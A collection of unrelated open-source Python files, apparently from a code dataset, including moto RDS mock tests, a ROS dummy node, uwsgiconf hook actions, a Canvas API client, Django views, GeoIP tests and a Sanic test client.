list(security_group.ip_ranges).should.equal([])
@mock_rds_deprecated
def test_get_security_groups():
conn = boto.rds.connect_to_region("us-west-2")
list(conn.get_all_dbsecurity_groups()).should.have.length_of(0)
conn.create_dbsecurity_group("db_sg1", "DB Security Group")
conn.create_dbsecurity_group("db_sg2", "DB Security Group")
list(conn.get_all_dbsecurity_groups()).should.have.length_of(2)
databases = conn.get_all_dbsecurity_groups("db_sg1")
list(databases).should.have.length_of(1)
databases[0].name.should.equal("db_sg1")
@mock_rds_deprecated
def test_get_non_existent_security_group():
conn = boto.rds.connect_to_region("us-west-2")
conn.get_all_dbsecurity_groups.when.called_with("not-a-sg").should.throw(
BotoServerError
)
@mock_rds_deprecated
def test_delete_database_security_group():
conn = boto.rds.connect_to_region("us-west-2")
conn.create_dbsecurity_group("db_sg", "DB Security Group")
list(conn.get_all_dbsecurity_groups()).should.have.length_of(1)
conn.delete_dbsecurity_group("db_sg")
list(conn.get_all_dbsecurity_groups()).should.have.length_of(0)
@mock_rds_deprecated
def test_delete_non_existent_security_group():
conn = boto.rds.connect_to_region("us-west-2")
conn.delete_dbsecurity_group.when.called_with("not-a-db").should.throw(
BotoServerError
)
@disable_on_py3()
@mock_rds_deprecated
def test_security_group_authorize():
conn = boto.rds.connect_to_region("us-west-2")
security_group = conn.create_dbsecurity_group("db_sg", "DB Security Group")
list(security_group.ip_ranges).should.equal([])
security_group.authorize(cidr_ip="10.3.2.45/32")
security_group = conn.get_all_dbsecurity_groups()[0]
list(security_group.ip_ranges).should.have.length_of(1)
security_group.ip_ranges[0].cidr_ip.should.equal("10.3.2.45/32")
@mock_rds_deprecated
def test_add_security_group_to_database():
conn = boto.rds.connect_to_region("us-west-2")
database = conn.create_dbinstance(
"db-master-1", 10, "db.m1.small", "root", "hunter2"
)
security_group = conn.create_dbsecurity_group("db_sg", "DB Security Group")
database.modify(security_groups=[security_group])
database = conn.get_all_dbinstances()[0]
list(database.security_groups).should.have.length_of(1)
database.security_groups[0].name.should.equal("db_sg")
@mock_ec2_deprecated
@mock_rds_deprecated
def test_add_database_subnet_group():
vpc_conn = boto.vpc.connect_to_region("us-west-2")
vpc = vpc_conn.create_vpc("10.0.0.0/16")
subnet1 = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")
subnet2 = vpc_conn.create_subnet(vpc.id, "10.0.2.0/24")
subnet_ids = [subnet1.id, subnet2.id]
conn = boto.rds.connect_to_region("us-west-2")
subnet_group = conn.create_db_subnet_group("db_subnet", "my db subnet", subnet_ids)
subnet_group.name.should.equal("db_subnet")
subnet_group.description.should.equal("my db subnet")
list(subnet_group.subnet_ids).should.equal(subnet_ids)
@mock_ec2_deprecated
@mock_rds_deprecated
def test_describe_database_subnet_group():
vpc_conn = boto.vpc.connect_to_region("us-west-2")
vpc = vpc_conn.create_vpc("10.0.0.0/16")
subnet = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")
conn = boto.rds.connect_to_region("us-west-2")
conn.create_db_subnet_group("db_subnet1", "my db subnet", [subnet.id])
conn.create_db_subnet_group("db_subnet2", "my db subnet", [subnet.id])
list(conn.get_all_db_subnet_groups()).should.have.length_of(2)
list(conn.get_all_db_subnet_groups("db_subnet1")).should.have.length_of(1)
conn.get_all_db_subnet_groups.when.called_with("not-a-subnet").should.throw(
BotoServerError
)
@mock_ec2_deprecated
@mock_rds_deprecated
def test_delete_database_subnet_group():
vpc_conn = boto.vpc.connect_to_region("us-west-2")
vpc = vpc_conn.create_vpc("10.0.0.0/16")
subnet = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")
conn = boto.rds.connect_to_region("us-west-2")
conn.create_db_subnet_group("db_subnet1", "my db subnet", [subnet.id])
list(conn.get_all_db_subnet_groups()).should.have.length_of(1)
conn.delete_db_subnet_group("db_subnet1")
list(conn.get_all_db_subnet_groups()).should.have.length_of(0)
conn.delete_db_subnet_group.when.called_with("db_subnet1").should.throw(
BotoServerError
)
@mock_ec2_deprecated
@mock_rds_deprecated
def test_create_database_in_subnet_group():
vpc_conn = boto.vpc.connect_to_region("us-west-2")
vpc = vpc_conn.create_vpc("10.0.0.0/16")
subnet = vpc_conn.create_subnet(vpc.id, "10.0.1.0/24")
conn = boto.rds.connect_to_region("us-west-2")
conn.create_db_subnet_group("db_subnet1", "my db subnet", [subnet.id])
database = conn.create_dbinstance(
"db-master-1",
10,
"db.m1.small",
"root",
"hunter2",
db_subnet_group_name="db_subnet1",
)
database = conn.get_all_dbinstances("db-master-1")[0]
database.subnet_group.name.should.equal("db_subnet1")
@mock_rds_deprecated
def test_create_database_replica():
conn = boto.rds.connect_to_region("us-west-2")
primary = conn.create_dbinstance(
"db-master-1", 10, "db.m1.small", "root", "hunter2"
)
replica = conn.create_dbinstance_read_replica(
"replica", "db-master-1", "db.m1.small"
)
replica.id.should.equal("replica")
replica.instance_class.should.equal("db.m1.small")
status_info = replica.status_infos[0]
status_info.normal.should.equal(True)
status_info.status_type.should.equal("read replication")
status_info.status.should.equal("replicating")
primary = conn.get_all_dbinstances("db-master-1")[0]
primary.read_replica_dbinstance_identifiers[0].should.equal("replica")
conn.delete_dbinstance("replica")
primary = conn.get_all_dbinstances("db-master-1")[0]
list(primary.read_replica_dbinstance_identifiers).should.have.length_of(0)
@mock_rds_deprecated
def test_create_cross_region_database_replica():
west_1_conn = boto.rds.connect_to_region("us-west-1")
west_2_conn = boto.rds.connect_to_region("us-west-2")
primary = west_1_conn.create_dbinstance(
"db-master-1", 10, "db.m1.small", "root", "hunter2"
)
primary_arn = "arn:aws:rds:us-west-1:1234567890:db:db-master-1"
replica = west_2_conn.create_dbinstance_read_replica(
"replica", primary_arn, "db.m1.small"
)
primary = west_1_conn.get_all_dbinstances("db-master-1")[0]
primary.read_replica_dbinstance_identifiers[0].should.equal("replica")
replica = west_2_conn.get_all_dbinstances("replica")[0]
replica.instance_class.should.equal("db.m1.small")
west_2_conn.delete_dbinstance("replica")
primary = west_1_conn.get_all_dbinstances("db-master-1")[0]
list(primary.read_replica_dbinstance_identifiers).should.have.length_of(0)
@mock_rds_deprecated
def test_connecting_to_us_east_1():
# boto does not use us-east-1 in the URL for RDS,
# and that broke moto in the past:
# https://github.com/boto/boto/blob/e271ff09364ea18d9d8b6f4d63d6b0ac6cbc9b75/boto/endpoints.json#L285
conn = boto.rds.connect_to_region("us-east-1")
database = conn.create_dbinstance(
"db-master-1", 10, "db.m1.small", "root", "hunter2", security_groups=["my_sg"]
)
database.status.should.equal("available")
database.id.should.equal("db-master-1")
database.allocated_storage.should.equal(10)
database.instance_class.should.equal("db.m1.small")
database.master_username.should.equal("root")
database.endpoint.should.equal(
("db-master-1.aaaaaaaaaa.us-east-1.rds.amazonaws.com", 3306)
)
database.security_groups[0].name.should.equal("my_sg")
@mock_rds_deprecated
def test_create_database_with_iops():
conn = boto.rds.connect_to_region("us-west-2")
database = conn.create_dbinstance(
"db-master-1", 10, "db.m1.small", "root", "hunter2", iops=6000
)
database.status.should.equal("available")
database.iops.should.equal(6000)
# boto>2.36.0 may change the following property name to `storage_type`
database.StorageType.should.equal("io1")
| william-richard/moto | tests/test_rds/test_rds.py | Python | apache-2.0 | 11,441 |
#!/usr/bin/env python
from __future__ import print_function
import rospy
import time, threading
from std_msgs.msg import String
from ros_status_cli.srv import *
NODE_NAME="dummy_node"
class DummyNode(object):
def periodic_publish(self):
self.pub.publish("test")
threading.Timer(0.01, self.periodic_publish).start()
def do_nothing(self):
pass
def start_dummy_service(self):
rospy.Service(NODE_NAME + '/dummy_service', DummyNodeAction, self.do_nothing)
def handle_dummy_node_action(self, req):
action = req.action
result = True
if action == "log debug":
rospy.logdebug("log debug")
elif action == "log info":
rospy.loginfo("log info")
elif action == "log warn":
rospy.logwarn("log warn")
elif action == "log err":
rospy.logerr("log err")
elif action == "log fatal":
rospy.logfatal("log fatal")
elif action == "init publisher":
self.pub = rospy.Publisher('test_topic', String, queue_size=10)
self.periodic_publish()
elif action == "init service":
self.start_dummy_service()
elif action == "shutdown":
self.shutdown = True
else:
result = False
print("unknown action")
print("handle node action called")
return DummyNodeActionResponse(result)
def start(self):
rospy.init_node(NODE_NAME, log_level=rospy.DEBUG, anonymous=False)
s = rospy.Service('test_service', DummyNodeAction, self.handle_dummy_node_action)
r = rospy.Rate(10)
self.shutdown = False
while not self.shutdown:
r.sleep()
print("shutting down")
rospy.signal_shutdown("requested")
if __name__ == '__main__':
node = DummyNode()
node.start()
| team-diana/ros_status_cli | test/rostest/dummy_node.py | Python | mit | 1,898 |
#-*- coding: UTF-8
import re
splitter = re.compile(
ur'([,\.!\?:;\s\n\t])'
, re.UNICODE)
def tokenize(string):
'''Split string to words'''
return [
item.strip() for item in splitter.split(string) if len(item.strip()) > 0
]
if __name__ == '__main__':
import unittest
class TokenizerTest(unittest.TestCase):
def testIt(self):
tokens = [ u'хуй', u'пизда', u'анархия' ]
dirty_tokens = [ token + u'!' for token in tokens ]
assert(tokenize(' '.join(tokens)) == tokens)
assert(len(tokenize(' '.join(dirty_tokens))) == len(tokens) * 2)
unittest.main()
| trunk/littlebrother | littlebrother/ident/utils.py | Python | mit | 594 |
from pathlib import Path
from typing import Union
from ..base import ParametrizedValue
from ..utils import listify
class HookAction(ParametrizedValue):
pass
class ActionMount(HookAction):
"""Mount or unmount filesystems.
Examples:
* Mount: proc none /proc
* Unmount: /proc
"""
name = 'mount'
def __init__(self, mountpoint, *, fs=None, src=None, flags=None):
"""
:param str mountpoint:
:param str fs: Filesystem. Presence indicates mounting.
:param str src: Presence indicates mounting.
:param str|list flags: Flags available for the operating system.
As an example on Linux you will options like: bind, recursive, readonly, rec, detach etc.
"""
if flags is not None:
flags = listify(flags)
flags = ','.join(flags)
if fs:
args = [fs, src, mountpoint, flags]
else:
args = [mountpoint, flags]
self.name = 'umount'
super().__init__(*args)
class ActionExecute(HookAction):
"""Run the shell command.
Command run under ``/bin/sh``.
If for some reason you do not want to use ``/bin/sh``,
use ``binsh`` option,
Examples:
* cat /proc/self/mounts
"""
name = 'exec'
# todo consider adding safeexec
def __init__(self, command):
super().__init__(command)
class ActionCall(HookAction):
"""Call functions in the current process address space."""
name = 'call'
def __init__(self, target, *, honour_exit_status=False, arg_int=False):
"""
:param str target: Symbol and args.
:param bool honour_exit_status: Expect an int return.
Anything != 0 means failure.
:param bool arg_int: Parse the argument as an int.
"""
name = self.name
if arg_int:
name += 'int'
if honour_exit_status:
name += 'ret'
self.name = name
super().__init__(target)
class ActionDirChange(HookAction):
"""Changes a directory.
Convenience action, same as ``call:chdir <directory>``.
"""
name = 'cd'
def __init__(self, target_dir):
super().__init__(target_dir)
class ActionDirCreate(HookAction):
"""Creates a directory with 0777."""
name = 'mkdir'
def __init__(self, target_dir):
super().__init__(target_dir)
class ActionFileCreate(HookAction):
"""Creates a directory with 0666."""
name = 'create'
def __init__(self, fpath: Union[str, Path]):
super().__init__(fpath)
class ActionExit(HookAction):
"""Exits.
Convenience action, same as ``callint:exit [num]``.
"""
name = 'exit'
def __init__(self, status_code=None):
super().__init__(status_code)
class ActionPrintout(HookAction):
"""Prints.
Convenience action, same as calling the ``uwsgi_log`` symbol.
"""
name = 'print'
def __init__(self, text=None):
super().__init__(text)
class ActionSetHostName(HookAction):
"""Sets a host name."""
name = 'hostname'
def __init__(self, name):
super().__init__(name)
class ActionAlarm(HookAction):
"""Issues an alarm. See ``.alarms`` options group."""
name = 'alarm'
def __init__(self, alarm, message):
super().__init__(alarm, message)
class ActionFileWrite(HookAction):
"""Writes a string to the specified file.
If file doesn't exist it will be created.
.. note:: Since 1.9.21
"""
name = 'write'
def __init__(self, target, text, *, append=False, newline=False):
"""
:param str target: File to write to.
:param str text: Text to write into file.
:param bool append: Append text instead of rewrite.
:param bool newline: Add a newline at the end.
"""
if append:
self.name = 'append'
if newline:
self.name += 'n'
super().__init__(target, text)
class ActionFifoWrite(HookAction):
"""Writes a string to the specified FIFO (see ``fifo_file`` from ``master_process`` params)."""
name = 'writefifo'
def __init__(self, target, text, *, wait=False):
"""
:param bool wait: Wait until FIFO is available.
"""
if wait:
self.name = 'spinningfifo'
super().__init__(target, text)
class ActionUnlink(HookAction):
"""Unlink the specified file.
.. note:: Since 1.9.21
"""
name = 'unlink'
def __init__(self, target):
super().__init__(target)
| idlesign/uwsgiconf | uwsgiconf/options/main_process_actions.py | Python | bsd-3-clause | 4,593 |
"""CommMessages API Version 1.0.
This API client was generated using a template. Make sure this code is valid before using it.
"""
import logging
from datetime import date, datetime
from .base import BaseCanvasAPI
from .base import BaseModel
class CommMessagesAPI(BaseCanvasAPI):
"""CommMessages API Version 1.0."""
def __init__(self, *args, **kwargs):
"""Init method for CommMessagesAPI."""
super(CommMessagesAPI, self).__init__(*args, **kwargs)
self.logger = logging.getLogger("py3canvas.CommMessagesAPI")
def list_of_commmessages_for_user(self, user_id, end_time=None, start_time=None):
"""
List of CommMessages for a user.
Retrieve a paginated list of messages sent to a user.
"""
path = {}
data = {}
params = {}
# REQUIRED - user_id
"""
The user id for whom you want to retrieve CommMessages
"""
params["user_id"] = user_id
# OPTIONAL - start_time
"""
The beginning of the time range you want to retrieve message from.
Up to a year prior to the current date is available.
"""
if start_time is not None:
if issubclass(start_time.__class__, str):
start_time = self._validate_iso8601_string(start_time)
elif issubclass(start_time.__class__, date) or issubclass(
start_time.__class__, datetime
):
start_time = start_time.strftime("%Y-%m-%dT%H:%M:%S+00:00")
params["start_time"] = start_time
# OPTIONAL - end_time
"""
The end of the time range you want to retrieve messages for.
Up to a year prior to the current date is available.
"""
if end_time is not None:
if issubclass(end_time.__class__, str):
end_time = self._validate_iso8601_string(end_time)
elif issubclass(end_time.__class__, date) or issubclass(
end_time.__class__, datetime
):
end_time = end_time.strftime("%Y-%m-%dT%H:%M:%S+00:00")
params["end_time"] = end_time
self.logger.debug(
"GET /api/v1/comm_messages with query params: {params} and form data: {data}".format(
params=params, data=data, **path
)
)
return self.generic_request(
"GET",
"/api/v1/comm_messages".format(**path),
data=data,
params=params,
all_pages=True,
)
class Commmessage(BaseModel):
"""Commmessage Model."""
def __init__(
self,
id=None,
created_at=None,
sent_at=None,
workflow_state=None,
_from=None,
from_name=None,
to=None,
reply_to=None,
subject=None,
body=None,
html_body=None,
):
"""Init method for Commmessage class."""
self._id = id
self._created_at = created_at
self._sent_at = sent_at
self._workflow_state = workflow_state
self._from = _from
self._from_name = from_name
self._to = to
self._reply_to = reply_to
self._subject = subject
self._body = body
self._html_body = html_body
self.logger = logging.getLogger("py3canvas.Commmessage")
@property
def id(self):
"""The ID of the CommMessage."""
return self._id
@id.setter
def id(self, value):
"""Setter for id property."""
self.logger.warn(
"Setting values on id will NOT update the remote Canvas instance."
)
self._id = value
@property
def created_at(self):
"""The date and time this message was created."""
return self._created_at
@created_at.setter
def created_at(self, value):
"""Setter for created_at property."""
self.logger.warn(
"Setting values on created_at will NOT update the remote Canvas instance."
)
self._created_at = value
@property
def sent_at(self):
"""The date and time this message was sent."""
return self._sent_at
@sent_at.setter
def sent_at(self, value):
"""Setter for sent_at property."""
self.logger.warn(
"Setting values on sent_at will NOT update the remote Canvas instance."
)
self._sent_at = value
@property
def workflow_state(self):
"""The workflow state of the message. One of 'created', 'staged', 'sending', 'sent', 'bounced', 'dashboard', 'cancelled', or 'closed'."""
return self._workflow_state
@workflow_state.setter
def workflow_state(self, value):
"""Setter for workflow_state property."""
self.logger.warn(
"Setting values on workflow_state will NOT update the remote Canvas instance."
)
self._workflow_state = value
@property
def _from(self):
"""The address that was put in the 'from' field of the message."""
return self._from
@_from.setter
def _from(self, value):
"""Setter for from property."""
self.logger.warn(
"Setting values on from will NOT update the remote Canvas instance."
)
self._from = value
@property
def from_name(self):
"""The display name for the from address."""
return self._from_name
@from_name.setter
def from_name(self, value):
"""Setter for from_name property."""
self.logger.warn(
"Setting values on from_name will NOT update the remote Canvas instance."
)
self._from_name = value
@property
def to(self):
"""The address the message was sent to:."""
return self._to
@to.setter
def to(self, value):
"""Setter for to property."""
self.logger.warn(
"Setting values on to will NOT update the remote Canvas instance."
)
self._to = value
@property
def reply_to(self):
"""The reply_to header of the message."""
return self._reply_to
@reply_to.setter
def reply_to(self, value):
"""Setter for reply_to property."""
self.logger.warn(
"Setting values on reply_to will NOT update the remote Canvas instance."
)
self._reply_to = value
@property
def subject(self):
"""The message subject."""
return self._subject
@subject.setter
def subject(self, value):
"""Setter for subject property."""
self.logger.warn(
"Setting values on subject will NOT update the remote Canvas instance."
)
self._subject = value
@property
def body(self):
"""The plain text body of the message."""
return self._body
@body.setter
def body(self, value):
"""Setter for body property."""
self.logger.warn(
"Setting values on body will NOT update the remote Canvas instance."
)
self._body = value
@property
def html_body(self):
"""The HTML body of the message."""
return self._html_body
@html_body.setter
def html_body(self, value):
"""Setter for html_body property."""
self.logger.warn(
"Setting values on html_body will NOT update the remote Canvas instance."
)
self._html_body = value
| tylerclair/py3canvas | py3canvas/apis/comm_messages.py | Python | mit | 7,448 |
from awards.forms import AwardForm
from awards.models import JudgeAllowance
from awards.models import Award
from challenges.decorators import judge_required
from challenges.models import Submission
from django.contrib import messages
from django.http import Http404, HttpResponseRedirect
from django.views.decorators.http import require_POST
from tower import ugettext as _
@judge_required
@require_POST
def award(request, submission_id, project=None, slug=None):
"""Awards an ammount to a gren-lit ``Submission`` by a Judge"""
try:
submission = (Submission.objects
.select_related('phase')
.get(id=submission_id, phase__challenge__slug=slug,
phase__challenge__project__slug=project,
is_winner=True, is_draft=False))
except Submission.DoesNotExist:
raise Http404
judge_data = {
'judge': request.user.get_profile(),
'award__phase': submission.phase,
'award__status': Award.RELEASED,
}
if submission.phase_round:
judge_data.update({'award__phase_round': submission.phase_round})
try:
judge_allowance = JudgeAllowance.objects.get(**judge_data)
except JudgeAllowance.DoesNotExist:
raise Http404
form = AwardForm(request.POST)
if form.is_valid():
is_allocated = judge_allowance.allocate(form.cleaned_data['amount'],
submission)
if form.cleaned_data['amount'] == 0:
submission_award = (judge_allowance.submissionaward_set
.filter(submission=submission))
if submission_award:
submission_award.delete()
message = _("You have successfuly removed the award from this"
" submission")
messages.success(request, message)
return HttpResponseRedirect(submission.get_absolute_url())
if is_allocated:
message = _("You have successfuly awarded this Entry")
messages.success(request, message)
return HttpResponseRedirect(submission.get_absolute_url())
if form.errors:
message = _("Please enter a valid amount for the award")
else:
message = _("You don't have enough funding for award this submission")
messages.error(request, message)
return HttpResponseRedirect(submission.get_absolute_url())
| mozilla/mozilla-ignite | apps/awards/views.py | Python | bsd-3-clause | 2,471 |
from __future__ import unicode_literals
import os
from django.conf import settings
from django.contrib.gis.geos import GEOSGeometry
from django.contrib.gis.geoip import GeoIP, GeoIPException
from django.utils import unittest
from django.utils import six
# Note: Requires use of both the GeoIP country and city datasets.
# The GEOIP_DATA path should be the only setting set (the directory
# should contain links or the actual database files 'GeoIP.dat' and
# 'GeoLiteCity.dat'.
class GeoIPTest(unittest.TestCase):
def test01_init(self):
"Testing GeoIP initialization."
g1 = GeoIP() # Everything inferred from GeoIP path
path = settings.GEOIP_PATH
g2 = GeoIP(path, 0) # Passing in data path explicitly.
g3 = GeoIP.open(path, 0) # MaxMind Python API syntax.
for g in (g1, g2, g3):
self.assertEqual(True, bool(g._country))
self.assertEqual(True, bool(g._city))
# Only passing in the location of one database.
city = os.path.join(path, 'GeoLiteCity.dat')
cntry = os.path.join(path, 'GeoIP.dat')
g4 = GeoIP(city, country='')
self.assertEqual(None, g4._country)
g5 = GeoIP(cntry, city='')
self.assertEqual(None, g5._city)
# Improper parameters.
bad_params = (23, 'foo', 15.23)
for bad in bad_params:
self.assertRaises(GeoIPException, GeoIP, cache=bad)
if isinstance(bad, six.string_types):
e = GeoIPException
else:
e = TypeError
self.assertRaises(e, GeoIP, bad, 0)
def test02_bad_query(self):
"Testing GeoIP query parameter checking."
cntry_g = GeoIP(city='<foo>')
# No city database available, these calls should fail.
self.assertRaises(GeoIPException, cntry_g.city, 'google.com')
self.assertRaises(GeoIPException, cntry_g.coords, 'yahoo.com')
# Non-string query should raise TypeError
self.assertRaises(TypeError, cntry_g.country_code, 17)
self.assertRaises(TypeError, cntry_g.country_name, GeoIP)
def test03_country(self):
"Testing GeoIP country querying methods."
g = GeoIP(city='<foo>')
fqdn = 'www.google.com'
addr = '12.215.42.19'
for query in (fqdn, addr):
for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
self.assertEqual('US', func(query))
for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
self.assertEqual('United States', func(query))
self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
g.country(query))
def test04_city(self):
"Testing GeoIP city querying methods."
g = GeoIP(country='<foo>')
addr = '128.249.1.1'
fqdn = 'tmc.edu'
for query in (fqdn, addr):
# Country queries should still work.
for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
self.assertEqual('US', func(query))
for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
self.assertEqual('United States', func(query))
self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
g.country(query))
# City information dictionary.
d = g.city(query)
self.assertEqual('USA', d['country_code3'])
self.assertEqual('Houston', d['city'])
self.assertEqual('TX', d['region'])
self.assertEqual(713, d['area_code'])
geom = g.geos(query)
self.assertTrue(isinstance(geom, GEOSGeometry))
lon, lat = (-95.4010, 29.7079)
lat_lon = g.lat_lon(query)
lat_lon = (lat_lon[1], lat_lon[0])
for tup in (geom.tuple, g.coords(query), g.lon_lat(query), lat_lon):
self.assertAlmostEqual(lon, tup[0], 4)
self.assertAlmostEqual(lat, tup[1], 4)
def test05_unicode_response(self):
"Testing that GeoIP strings are properly encoded, see #16553."
g = GeoIP()
d = g.city('62.224.93.23')
self.assertEqual('Schümberg', d['city'])
def test06_unicode_query(self):
"Testing that GeoIP accepts unicode string queries, see #17059."
g = GeoIP()
d = g.country('whitehouse.gov')
self.assertEqual('US', d['country_code'])
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GeoIPTest))
return s
def run(verbosity=1):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| azurestandard/django | django/contrib/gis/geoip/tests.py | Python | bsd-3-clause | 4,742 |
# Copyright 2015-2017 Eficent Business and IT Consulting Services S.L.
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
{
"name": "Account Due List Aging Comment",
"version": "14.0.1.0.0",
"category": "Generic Modules/Payment",
"author": "Eficent," "Odoo Community Association (OCA),",
"website": "https://github.com/OCA/account-payment",
"license": "AGPL-3",
"depends": [
"account_due_list",
],
"data": [
"views/payment_view.xml",
],
"installable": True,
}
| OCA/account-payment | account_due_list_aging_comment/__manifest__.py | Python | agpl-3.0 | 539 |
#!/usr/bin/env python
traindat = '../data/fm_train_byte.dat'
testdat = '../data/fm_test_byte.dat'
parameter_list=[[traindat,testdat],[traindat,testdat]]
def kernel_linear_byte (train_fname=traindat,test_fname=testdat):
from shogun import LinearKernel, ByteFeatures, CSVFile
feats_train=ByteFeatures(CSVFile(train_fname))
feats_test=ByteFeatures(CSVFile(test_fname))
kernel=LinearKernel(feats_train, feats_train)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return kernel
if __name__=='__main__':
print('LinearByte')
kernel_linear_byte(*parameter_list[0])
| cfjhallgren/shogun | examples/undocumented/python/kernel_linear_byte.py | Python | gpl-3.0 | 634 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand
from django.utils.translation import activate
from django.conf import settings
from core.models import Declaration, Person, Company
from core.importers.company import CompanyImporter
from core.importers.person2company import Person2CompanyImporter
from core.universal_loggers import PythonLogger
from tasks.elastic_models import EDRPOU
from tasks.models import BeneficiariesMatching
class Command(BaseCommand):
help = """
"""
status_order = (
"зареєстровано",
"зареєстровано, свідоцтво про державну реєстрацію недійсне",
"порушено справу про банкрутство",
"порушено справу про банкрутство (санація)",
"в стані припинення",
"припинено",
)
def add_arguments(self, parser):
parser.add_argument(
'--real_run',
action='store_true',
dest='real_run',
default=False,
help='Connect beneficiar owners to companies for real',
)
def get_latest_declaration_record(self, ownership):
def key_fun(rec):
return rec["year_declared"], rec.get("is_fixed", False)
if ownership.pep_company_information:
return sorted(
ownership.pep_company_information,
key=key_fun, reverse=True
)[0]
def connect_domestic_companies(self, save_it):
for ownership in BeneficiariesMatching.objects.filter(status="m"):
k = ownership.edrpou_match.lstrip("0")
if k == "NONE":
continue
if not k:
self.stderr.write(
"Approved company with the key %s has no edrpou!, skipping" %
(
ownership.company_key,
)
)
self.failed += 1
continue
ans = EDRPOU.find_by_edrpou(k)
if len(ans) > 1:
self.stderr.write(
"Too many companies found by code %s, for the key %s, skipping" %
(
ownership.edrpou_match,
ownership.company_key
)
)
self.failed += 1
continue
if not ans:
try:
company = Company.objects.get(
edrpou=unicode(ownership.edrpou_match).rjust(8, "0"))
except Company.DoesNotExist:
self.stderr.write(
"Cannot find a company by code %s, for the key %s, skipping" %
(
ownership.edrpou_match,
ownership.company_key
)
)
self.failed += 1
continue
else:
company, created = self.importer.get_or_create_from_edr_record(ans[0].to_dict(), save_it)
if not company:
self.stderr.write(
"Cannot create a company by code %s, for the key %s, skipping" %
(
ownership.edrpou_match,
ownership.company_key
)
)
self.failed += 1
continue
else:
company.affiliated_with_pep = True
company.save()
if created:
self.companies_created += 1
self.stdout.write("Created company %s" % company)
else:
self.companies_updated += 1
self.stdout.write("Updated company %s" % company)
try:
person = Person.objects.get(pk=ownership.person)
except Person.DoesNotExist:
self.stderr.write(
"Cannot find a person by code %s, for the key %s, skipping" %
(
ownership.person,
ownership.company_key
)
)
self.failed += 1
continue
most_recent_record = self.get_latest_declaration_record(ownership)
for d in ownership.declarations:
try:
decl = Declaration.objects.get(pk=d)
except Declaration.DoesNotExist:
self.stderr.write(
"Cannot find a declaration by id %s, for the key %s, skipping" %
(
d,
ownership.company_key
)
)
continue
conn, conn_created = self.conn_importer.get_or_create_from_declaration(
person, company,
most_recent_record.get("link_type", "Бенефіціарний власник"), decl, save_it)
if most_recent_record.get("percent_of_cost"):
conn.share = most_recent_record["percent_of_cost"]
if save_it:
conn.save()
if conn_created:
self.connections_created += 1
self.stdout.write("Created connection %s" % conn)
else:
self.connections_updated += 1
self.stdout.write("Updated connection %s" % conn)
self.successful += 1
def connect_foreign_companies(self, save_it):
for ownership in BeneficiariesMatching.objects.filter(status="y"):
if len(ownership.candidates_json) != 1:
self.stderr.write(
"Strange number of matches (%s) for foreign company %s" %
(
len(ownership.candidates_json),
ownership.company_key
)
)
continue
try:
company = Company.objects.get(pk=ownership.candidates_json[0]["id"])
except Company.DoesNotExist:
self.stderr.write(
"Cannot find a company by id %s, for the key %s, skipping" %
(
ownership.candidates_json[0]["id"],
ownership.company_key
)
)
self.failed += 1
continue
try:
person = Person.objects.get(pk=ownership.person)
except Person.DoesNotExist:
self.stderr.write(
"Cannot find a person by code %s, for the key %s, skipping" %
(
ownership.person,
ownership.company_key
)
)
self.failed += 1
continue
most_recent_record = self.get_latest_declaration_record(ownership)
for d in ownership.declarations:
try:
decl = Declaration.objects.get(pk=d)
except Declaration.DoesNotExist:
self.stderr.write(
"Cannot find a declaration by id %s, for the key %s, skipping" %
(
d,
ownership.company_key
)
)
continue
conn, conn_created = self.conn_importer.get_or_create_from_declaration(
person, company,
most_recent_record.get("link_type", "Бенефіціарний власник"), decl, save_it)
if most_recent_record.get("percent_of_cost"):
conn.share = most_recent_record["percent_of_cost"]
if save_it:
conn.save()
if conn_created:
self.connections_created += 1
self.stdout.write("Created connection %s" % conn)
else:
self.connections_updated += 1
self.stdout.write("Updated connection %s" % conn)
self.successful += 1
def handle(self, *args, **options):
activate(settings.LANGUAGE_CODE)
self.importer = CompanyImporter(logger=PythonLogger("cli_commands"))
self.conn_importer = Person2CompanyImporter(logger=PythonLogger("cli_commands"))
self.successful = 0
self.failed = 0
self.companies_created = 0
self.companies_updated = 0
self.connections_created = 0
self.connections_updated = 0
self.connect_domestic_companies(options["real_run"])
self.connect_foreign_companies(options["real_run"])
self.stdout.write(
"Creation failed: %s, creation successful: %s" % (self.failed, self.successful)
)
self.stdout.write(
"Companies created: %s, companies updated: %s" %
(self.companies_created, self.companies_updated)
)
self.stdout.write(
"Connections created: %s, connections updated: %s" %
(self.connections_created, self.connections_updated)
)
| dchaplinsky/pep.org.ua | pepdb/tasks/management/commands/apply_beneficiaries.py | Python | mit | 9,604 |
# -*- coding: utf-8 -*-
import opster
import macspoof
spoof_options = [
('a', 'airport', False, 'treat interface as airport card'),
]
@opster.command(usage='INTERFACE <mac>', options=spoof_options)
def spoof(interface, mac=None, **opts):
"""spoofs mac address of given interface
"""
if interface in macspoof.interfaces.list():
message = macspoof.core.spoof(interface, mac)
else:
print('Please specify a valid interface.')
@opster.command(name='list|l|ls', usage='fukit')
def list(**opts):
"""lists avaiable network interfaces"""
_interfaces = macspoof.interfaces.fetch()
for iface in _interfaces:
print '%s (%s)' % (iface.id, iface.mac)
def start():
opster.dispatch() | kennethreitz-archive/macspoof | macspoof/cli.py | Python | mit | 696 |
import traceback
from sanic.log import log
HOST = '127.0.0.1'
PORT = 42101
class SanicTestClient:
def __init__(self, app):
self.app = app
async def _local_request(self, method, uri, cookies=None, *args, **kwargs):
import aiohttp
if uri.startswith(('http:', 'https:', 'ftp:', 'ftps://' '//')):
url = uri
else:
url = 'http://{host}:{port}{uri}'.format(
host=HOST, port=PORT, uri=uri)
log.info(url)
conn = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(
cookies=cookies, connector=conn) as session:
async with getattr(
session, method.lower())(url, *args, **kwargs) as response:
try:
response.text = await response.text()
except UnicodeDecodeError as e:
response.text = None
response.body = await response.read()
